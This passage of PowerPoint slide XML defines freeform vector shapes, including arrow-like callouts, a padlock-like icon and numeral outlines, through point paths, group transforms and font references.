                <a:lnTo>
                  <a:pt x="156" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="189" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="113" y="212"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="21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2400"/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E4CE7046-64D6-48C1-B7B8-9D5763BA3105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3496641" y="1600201"/>
            <a:ext cx="5198718" cy="4496838"/>
            <a:chOff x="3736336" y="2014895"/>
            <a:chExt cx="4719296" cy="4082143"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="113" name="Group 112"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3736336" y="5001931"/>
              <a:ext cx="1013878" cy="499940"/>
              <a:chOff x="3736336" y="5001931"/>
              <a:chExt cx="1013878" cy="499940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="161" name="Freeform 13"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3736336" y="5001931"/>
                <a:ext cx="1013878" cy="499940"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 260 w 724"/>
                  <a:gd name="T1" fmla="*/ 357 h 357"/>
                  <a:gd name="T2" fmla="*/ 507 w 724"/>
                  <a:gd name="T3" fmla="*/ 357 h 357"/>
                  <a:gd name="T4" fmla="*/ 724 w 724"/>
                  <a:gd name="T5" fmla="*/ 0 h 357"/>
                  <a:gd name="T6" fmla="*/ 260 w 724"/>
                  <a:gd name="T7" fmla="*/ 0 h 357"/>
                  <a:gd name="T8" fmla="*/ 0 w 724"/>
                  <a:gd name="T9" fmla="*/ 176 h 357"/>
                  <a:gd name="T10" fmla="*/ 260 w 724"/>
                  <a:gd name="T11" fmla="*/ 357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4" h="357">
                    <a:moveTo>
                      <a:pt x="260" y="357"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="507" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="357"/>
                    </a:ln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" name="Freeform 14"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3789551" y="5031340"/>
                <a:ext cx="943859" cy="441124"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 674 w 674"/>
                  <a:gd name="T1" fmla="*/ 0 h 315"/>
                  <a:gd name="T2" fmla="*/ 230 w 674"/>
                  <a:gd name="T3" fmla="*/ 0 h 315"/>
                  <a:gd name="T4" fmla="*/ 0 w 674"/>
                  <a:gd name="T5" fmla="*/ 155 h 315"/>
                  <a:gd name="T6" fmla="*/ 230 w 674"/>
                  <a:gd name="T7" fmla="*/ 315 h 315"/>
                  <a:gd name="T8" fmla="*/ 481 w 674"/>
                  <a:gd name="T9" fmla="*/ 315 h 315"/>
                  <a:gd name="T10" fmla="*/ 674 w 674"/>
                  <a:gd name="T11" fmla="*/ 0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315">
                    <a:moveTo>
                      <a:pt x="674" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="230" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67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14" name="Group 113"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4433728" y="3567930"/>
              <a:ext cx="987271" cy="568559"/>
              <a:chOff x="4433728" y="3567930"/>
              <a:chExt cx="987271" cy="568559"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="157" name="Freeform 11"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4433728" y="3567930"/>
                <a:ext cx="987271" cy="568559"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 260 w 705"/>
                  <a:gd name="T1" fmla="*/ 406 h 406"/>
                  <a:gd name="T2" fmla="*/ 488 w 705"/>
                  <a:gd name="T3" fmla="*/ 406 h 406"/>
                  <a:gd name="T4" fmla="*/ 705 w 705"/>
                  <a:gd name="T5" fmla="*/ 0 h 406"/>
                  <a:gd name="T6" fmla="*/ 260 w 705"/>
                  <a:gd name="T7" fmla="*/ 0 h 406"/>
                  <a:gd name="T8" fmla="*/ 0 w 705"/>
                  <a:gd name="T9" fmla="*/ 202 h 406"/>
                  <a:gd name="T10" fmla="*/ 260 w 705"/>
                  <a:gd name="T11" fmla="*/ 406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5" h="406">
                    <a:moveTo>
                      <a:pt x="260" y="406"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="488" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="406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" name="Freeform 12"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4488343" y="3600139"/>
                <a:ext cx="917252" cy="504141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 655 w 655"/>
                  <a:gd name="T1" fmla="*/ 0 h 360"/>
                  <a:gd name="T2" fmla="*/ 230 w 655"/>
                  <a:gd name="T3" fmla="*/ 0 h 360"/>
                  <a:gd name="T4" fmla="*/ 0 w 655"/>
                  <a:gd name="T5" fmla="*/ 179 h 360"/>
                  <a:gd name="T6" fmla="*/ 230 w 655"/>
                  <a:gd name="T7" fmla="*/ 360 h 360"/>
                  <a:gd name="T8" fmla="*/ 462 w 655"/>
                  <a:gd name="T9" fmla="*/ 360 h 360"/>
                  <a:gd name="T10" fmla="*/ 655 w 655"/>
                  <a:gd name="T11" fmla="*/ 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5" h="360">
                    <a:moveTo>
                      <a:pt x="655" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="230" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655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" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4778222" y="3710770"/>
                <a:ext cx="141439" cy="246469"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 111 w 111"/>
                  <a:gd name="T1" fmla="*/ 117 h 194"/>
                  <a:gd name="T2" fmla="*/ 96 w 111"/>
                  <a:gd name="T3" fmla="*/ 175 h 194"/>
                  <a:gd name="T4" fmla="*/ 56 w 111"/>
                  <a:gd name="T5" fmla="*/ 194 h 194"/>
                  <a:gd name="T6" fmla="*/ 15 w 111"/>
                  <a:gd name="T7" fmla="*/ 175 h 194"/>
                  <a:gd name="T8" fmla="*/ 0 w 111"/>
                  <a:gd name="T9" fmla="*/ 117 h 194"/>
                  <a:gd name="T10" fmla="*/ 0 w 111"/>
                  <a:gd name="T11" fmla="*/ 77 h 194"/>
                  <a:gd name="T12" fmla="*/ 15 w 111"/>
                  <a:gd name="T13" fmla="*/ 19 h 194"/>
                  <a:gd name="T14" fmla="*/ 55 w 111"/>
                  <a:gd name="T15" fmla="*/ 0 h 194"/>
                  <a:gd name="T16" fmla="*/ 96 w 111"/>
                  <a:gd name="T17" fmla="*/ 19 h 194"/>
                  <a:gd name="T18" fmla="*/ 111 w 111"/>
                  <a:gd name="T19" fmla="*/ 77 h 194"/>
                  <a:gd name="T20" fmla="*/ 111 w 111"/>
                  <a:gd name="T21" fmla="*/ 117 h 194"/>
                  <a:gd name="T22" fmla="*/ 74 w 111"/>
                  <a:gd name="T23" fmla="*/ 73 h 194"/>
                  <a:gd name="T24" fmla="*/ 69 w 111"/>
                  <a:gd name="T25" fmla="*/ 40 h 194"/>
                  <a:gd name="T26" fmla="*/ 56 w 111"/>
                  <a:gd name="T27" fmla="*/ 30 h 194"/>
                  <a:gd name="T28" fmla="*/ 55 w 111"/>
                  <a:gd name="T29" fmla="*/ 30 h 194"/>
                  <a:gd name="T30" fmla="*/ 42 w 111"/>
                  <a:gd name="T31" fmla="*/ 40 h 194"/>
                  <a:gd name="T32" fmla="*/ 37 w 111"/>
                  <a:gd name="T33" fmla="*/ 73 h 194"/>
                  <a:gd name="T34" fmla="*/ 37 w 111"/>
                  <a:gd name="T35" fmla="*/ 120 h 194"/>
                  <a:gd name="T36" fmla="*/ 42 w 111"/>
                  <a:gd name="T37" fmla="*/ 154 h 194"/>
                  <a:gd name="T38" fmla="*/ 55 w 111"/>
                  <a:gd name="T39" fmla="*/ 164 h 194"/>
                  <a:gd name="T40" fmla="*/ 56 w 111"/>
                  <a:gd name="T41" fmla="*/ 164 h 194"/>
                  <a:gd name="T42" fmla="*/ 69 w 111"/>
                  <a:gd name="T43" fmla="*/ 154 h 194"/>
                  <a:gd name="T44" fmla="*/ 74 w 111"/>
                  <a:gd name="T45" fmla="*/ 120 h 194"/>
                  <a:gd name="T46" fmla="*/ 74 w 111"/>
                  <a:gd name="T47" fmla="*/ 73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1" h="194">
                    <a:moveTo>
                      <a:pt x="111" y="117"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="142"/>
                      <a:pt x="106" y="162"/>
                      <a:pt x="96" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="188"/>
                      <a:pt x="72" y="194"/>
                      <a:pt x="56" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="194"/>
                      <a:pt x="25" y="188"/>
                      <a:pt x="15" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="0" y="142"/>
                      <a:pt x="0" y="11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52"/>
                      <a:pt x="5" y="32"/>
                      <a:pt x="15" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="6"/>
                      <a:pt x="39" y="0"/>
                      <a:pt x="55" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="0"/>
                      <a:pt x="86" y="6"/>
                      <a:pt x="96" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="32"/>
                      <a:pt x="111" y="52"/>
                      <a:pt x="111" y="77"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="111" y="117"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="74" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="58"/>
                      <a:pt x="72" y="47"/>
                      <a:pt x="69" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="61" y="30"/>
                      <a:pt x="56" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                      <a:pt x="55" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="30"/>
                      <a:pt x="45" y="33"/>
                      <a:pt x="42" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="47"/>
                      <a:pt x="37" y="58"/>
                      <a:pt x="37" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="120"/>
                      <a:pt x="37" y="120"/>
                      <a:pt x="37" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="136"/>
                      <a:pt x="39" y="147"/>
                      <a:pt x="42" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="161"/>
                      <a:pt x="49" y="164"/>
                      <a:pt x="55" y="164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62" y="164"/>
                      <a:pt x="66" y="161"/>
                      <a:pt x="69" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="147"/>
                      <a:pt x="74" y="136"/>
                      <a:pt x="74" y="120"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="74" y="7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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940667" y="3710770"/>
                <a:ext cx="145640" cy="246469"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 115"/>
                  <a:gd name="T1" fmla="*/ 81 h 194"/>
                  <a:gd name="T2" fmla="*/ 56 w 115"/>
                  <a:gd name="T3" fmla="*/ 81 h 194"/>
                  <a:gd name="T4" fmla="*/ 71 w 115"/>
                  <a:gd name="T5" fmla="*/ 74 h 194"/>
                  <a:gd name="T6" fmla="*/ 75 w 115"/>
                  <a:gd name="T7" fmla="*/ 54 h 194"/>
                  <a:gd name="T8" fmla="*/ 71 w 115"/>
                  <a:gd name="T9" fmla="*/ 36 h 194"/>
                  <a:gd name="T10" fmla="*/ 57 w 115"/>
                  <a:gd name="T11" fmla="*/ 29 h 194"/>
                  <a:gd name="T12" fmla="*/ 44 w 115"/>
                  <a:gd name="T13" fmla="*/ 35 h 194"/>
                  <a:gd name="T14" fmla="*/ 39 w 115"/>
                  <a:gd name="T15" fmla="*/ 51 h 194"/>
                  <a:gd name="T16" fmla="*/ 3 w 115"/>
                  <a:gd name="T17" fmla="*/ 51 h 194"/>
                  <a:gd name="T18" fmla="*/ 3 w 115"/>
                  <a:gd name="T19" fmla="*/ 50 h 194"/>
                  <a:gd name="T20" fmla="*/ 18 w 115"/>
                  <a:gd name="T21" fmla="*/ 14 h 194"/>
                  <a:gd name="T22" fmla="*/ 56 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 194"/>
                  <a:gd name="T24" fmla="*/ 97 w 115"/>
                  <a:gd name="T25" fmla="*/ 14 h 194"/>
                  <a:gd name="T26" fmla="*/ 112 w 115"/>
                  <a:gd name="T27" fmla="*/ 54 h 194"/>
                  <a:gd name="T28" fmla="*/ 106 w 115"/>
                  <a:gd name="T29" fmla="*/ 77 h 194"/>
                  <a:gd name="T30" fmla="*/ 87 w 115"/>
                  <a:gd name="T31" fmla="*/ 94 h 194"/>
                  <a:gd name="T32" fmla="*/ 108 w 115"/>
                  <a:gd name="T33" fmla="*/ 111 h 194"/>
                  <a:gd name="T34" fmla="*/ 115 w 115"/>
                  <a:gd name="T35" fmla="*/ 139 h 194"/>
                  <a:gd name="T36" fmla="*/ 98 w 115"/>
                  <a:gd name="T37" fmla="*/ 179 h 194"/>
                  <a:gd name="T38" fmla="*/ 56 w 115"/>
                  <a:gd name="T39" fmla="*/ 194 h 194"/>
                  <a:gd name="T40" fmla="*/ 17 w 115"/>
                  <a:gd name="T41" fmla="*/ 180 h 194"/>
                  <a:gd name="T42" fmla="*/ 1 w 115"/>
                  <a:gd name="T43" fmla="*/ 140 h 194"/>
                  <a:gd name="T44" fmla="*/ 1 w 115"/>
                  <a:gd name="T45" fmla="*/ 139 h 194"/>
                  <a:gd name="T46" fmla="*/ 37 w 115"/>
                  <a:gd name="T47" fmla="*/ 139 h 194"/>
                  <a:gd name="T48" fmla="*/ 43 w 115"/>
                  <a:gd name="T49" fmla="*/ 157 h 194"/>
                  <a:gd name="T50" fmla="*/ 57 w 115"/>
                  <a:gd name="T51" fmla="*/ 165 h 194"/>
                  <a:gd name="T52" fmla="*/ 72 w 115"/>
                  <a:gd name="T53" fmla="*/ 157 h 194"/>
                  <a:gd name="T54" fmla="*/ 78 w 115"/>
                  <a:gd name="T55" fmla="*/ 138 h 194"/>
                  <a:gd name="T56" fmla="*/ 72 w 115"/>
                  <a:gd name="T57" fmla="*/ 116 h 194"/>
                  <a:gd name="T58" fmla="*/ 56 w 115"/>
                  <a:gd name="T59" fmla="*/ 109 h 194"/>
                  <a:gd name="T60" fmla="*/ 37 w 115"/>
                  <a:gd name="T61" fmla="*/ 109 h 194"/>
                  <a:gd name="T62" fmla="*/ 37 w 115"/>
                  <a:gd name="T63" fmla="*/ 81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5" h="194">
                    <a:moveTo>
                      <a:pt x="37" y="81"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="81"/>
                      <a:pt x="56" y="81"/>
                      <a:pt x="56" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="81"/>
                      <a:pt x="67" y="78"/>
                      <a:pt x="71" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="69"/>
                      <a:pt x="75" y="62"/>
                      <a:pt x="75" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="47"/>
                      <a:pt x="74" y="41"/>
                      <a:pt x="71" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="31"/>
                      <a:pt x="63" y="29"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="29"/>
                      <a:pt x="48" y="31"/>
                      <a:pt x="44" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="39"/>
                      <a:pt x="39" y="45"/>
                      <a:pt x="39" y="51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3" y="36"/>
                      <a:pt x="8" y="23"/>
                      <a:pt x="18" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="4"/>
                      <a:pt x="41" y="0"/>
                      <a:pt x="56" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="0"/>
                      <a:pt x="87" y="4"/>
                      <a:pt x="97" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="23"/>
                      <a:pt x="112" y="36"/>
                      <a:pt x="112" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="62"/>
                      <a:pt x="110" y="70"/>
                      <a:pt x="106" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="85"/>
                      <a:pt x="95" y="90"/>
                      <a:pt x="87" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="98"/>
                      <a:pt x="103" y="104"/>
                      <a:pt x="108" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="119"/>
                      <a:pt x="115" y="128"/>
                      <a:pt x="115" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="156"/>
                      <a:pt x="109" y="169"/>
                      <a:pt x="98" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="189"/>
                      <a:pt x="73" y="194"/>
                      <a:pt x="56" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="194"/>
                      <a:pt x="27" y="189"/>
                      <a:pt x="17" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="171"/>
                      <a:pt x="0" y="158"/>
                      <a:pt x="1" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="139"/>
                      <a:pt x="1" y="139"/>
                      <a:pt x="1" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="139"/>
                      <a:pt x="37" y="139"/>
                      <a:pt x="37" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="147"/>
                      <a:pt x="39" y="153"/>
                      <a:pt x="43" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="162"/>
                      <a:pt x="51" y="165"/>
                      <a:pt x="57" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="165"/>
                      <a:pt x="68" y="162"/>
                      <a:pt x="72" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="153"/>
                      <a:pt x="78" y="146"/>
                      <a:pt x="78" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="128"/>
                      <a:pt x="76" y="121"/>
                      <a:pt x="72" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="112"/>
                      <a:pt x="63" y="109"/>
                      <a:pt x="56" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="109"/>
                      <a:pt x="37" y="109"/>
                      <a:pt x="37" y="109"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="37" y="8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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="115" name="Group 114"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6689747" y="2796314"/>
              <a:ext cx="960664" cy="592366"/>
              <a:chOff x="6689747" y="2796314"/>
              <a:chExt cx="960664" cy="592366"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="155" name="Freeform 7"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6689747" y="2796314"/>
                <a:ext cx="960664" cy="592366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 427 w 686"/>
                  <a:gd name="T1" fmla="*/ 423 h 423"/>
                  <a:gd name="T2" fmla="*/ 218 w 686"/>
                  <a:gd name="T3" fmla="*/ 423 h 423"/>
                  <a:gd name="T4" fmla="*/ 0 w 686"/>
                  <a:gd name="T5" fmla="*/ 0 h 423"/>
                  <a:gd name="T6" fmla="*/ 427 w 686"/>
                  <a:gd name="T7" fmla="*/ 0 h 423"/>
                  <a:gd name="T8" fmla="*/ 686 w 686"/>
                  <a:gd name="T9" fmla="*/ 210 h 423"/>
                  <a:gd name="T10" fmla="*/ 427 w 686"/>
                  <a:gd name="T11" fmla="*/ 423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86" h="423">
                    <a:moveTo>
                      <a:pt x="427" y="423"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="218" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="423"/>
                    </a:ln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" name="Freeform 8"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
